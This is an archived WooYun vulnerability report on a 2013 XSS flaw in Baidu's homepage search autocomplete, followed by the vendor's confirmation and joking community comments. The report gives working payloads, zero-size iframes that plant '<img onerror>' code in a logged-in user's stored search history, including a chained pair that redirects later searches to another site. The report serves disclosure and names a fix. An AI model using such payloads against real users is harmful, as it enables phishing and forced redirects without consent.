当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020415

漏洞标题:百度首页反射半自动存储xss

相关厂商:百度

漏洞作者: 呆子不开口

提交时间:2013-03-21 15:12

修复时间:2013-05-05 15:13

公开时间:2013-05-05 15:13

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-03-21: 细节已通知厂商并且等待厂商处理中
2013-03-21: 厂商已经确认,细节仅向厂商公开
2013-03-31: 细节向核心白帽子及相关领域专家公开
2013-04-10: 细节向普通白帽子公开
2013-04-20: 细节向实习白帽子公开
2013-05-05: 细节向公众公开

简要描述:

如果中标方是个有文采的互联网达人,此人会立马在微博上惊呼“天呐,360搜索加入了百度的阿拉丁计划”

详细说明:

chrome和ff下有效,IE没测,需要百度用户在登陆状态下
百度首页搜索汉字超过两个后,会把搜索内容及拼音写入浏览器的localstorage,当你再次搜索类似的词时,会在下拉框自动填充,但在当你输入的是字母时,自动响应出的汉字对应内容没有进行html转义

baidu.jpg


我们可以很简单的iframe一个构造好的搜索结果页来让用户浏览,如

<iframe src='http://www.baidu.com/s?wd=%E5%BE%AE%E5%8D%9A%3Cimg+src%3D1+onerror%3Dalert%281%29%3E' width='0' height='0'></iframe>
<img src=美女高潮图>


以后当用户再搜索或误输入"weib" "weibo"等字符时,就会执行我们的代码
这个漏洞比较难利用,可以写入localstorage的搜索内容有长度要求,可利用部分很短,自动填充用的是innerhtml,<script>无效。但由于每次可以显示两条,所以通过两次拼接,还是可以实现弹窗钓鱼或者转向广告业恶意页等,还是有一定危害。比如如下代码

<iframe src='http://www.baidu.com/s?wd=搜索<img+src+onerror%3Dlocation.href%3Da>' width='0' height='0'></iframe>
<iframe src='http://www.baidu.com/s?wd=搜索<img+src+onerror%3Da%3D%27%2F%2Fso.com%27>' width='0' height='0'></iframe>
<img src=美女完事累坏了图>


访问这样的页面后,以后在百度搜索框里只要敲"sous""sousu""sousuo"等都会跳到360搜索,如果中标方是个有文采的互联网达人,此人会立马在微博上惊呼“天呐,360搜索加入了百度的阿拉丁计划”

漏洞证明:

如上图

修复方案:

localstorage里的内容放入页面中时,做html转义
另,最好是能做到识别出,是用户主动搜索的内容才放入localstorage中

版权声明:转载请注明来源 呆子不开口@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2013-03-21 15:27

厂商回复:

感谢提交,马上联系业务部门修复!

最新状态:

暂无

漏洞评价:

评论

  1. 2013-03-21 15:13 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

    反射半自动

  2. 2013-03-21 15:13 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    手枪步枪有半自动,尼玛XSS也半自动?

  3. 2013-03-21 15:20 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    全乌云精华比例最高的白帽子,围观下

  4. 2013-03-21 15:27 | 呆子不开口 ( 普通白帽子 | Rank:324 漏洞数:25 | 求各种兼职)

    @梧桐雨 我帮管理员打过飞机这事我会到处乱说么

  5. 2013-03-21 15:29 | 呆子不开口 ( 普通白帽子 | Rank:324 漏洞数:25 | 求各种兼职)

    @小胖子 这是一种进步,要让用户有参与感,不能只顾自己玩的爽

  6. 2013-03-21 15:47 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    百度首页!!屌爆

  7. 2013-03-21 17:05 | 易水寒 ( 实习白帽子 | Rank:67 漏洞数:5 )

    洞主绝对是乌云里相声说的最好的一个,没有之一。

  8. 2013-03-21 17:54 | dtc ( 路人 | Rank:10 漏洞数:1 | 业余技术爱好者,来乌云学习。)

    卧槽。。

  9. 2013-03-21 22:25 | erevus ( 普通白帽子 | Rank:177 漏洞数:30 | Hacked by @ringzero 我錯了)

    碉堡了

  10. 2013-03-23 00:03 | retaker ( 路人 | Rank:1 漏洞数:1 | free open share)

    ?<script></script>调用腾讯的urlcheck这个吗

  11. 2013-04-01 09:18 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    这个名字有意思

  12. 2013-04-03 01:23 | 呆子不开口 ( 普通白帽子 | Rank:324 漏洞数:25 | 求各种兼职)

    test

  13. 2013-04-12 01:27 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @呆子不开口 你是个有想象力+细心的男人。

  14. 2013-04-12 11:47 | 呆子不开口 ( 普通白帽子 | Rank:324 漏洞数:25 | 求各种兼职)

    @_Evil 擦,竟然被你猜出我是个GAY

  15. 2013-04-20 17:00 | DM_ ( 实习白帽子 | Rank:72 漏洞数:15 )

    厉害,学到了

  16. 2013-04-20 18:53 | Ska ( 路人 | Rank:15 漏洞数:2 )

    ...洞主高手,有时候就是需要细心,每天我们也能看到关联搜索- -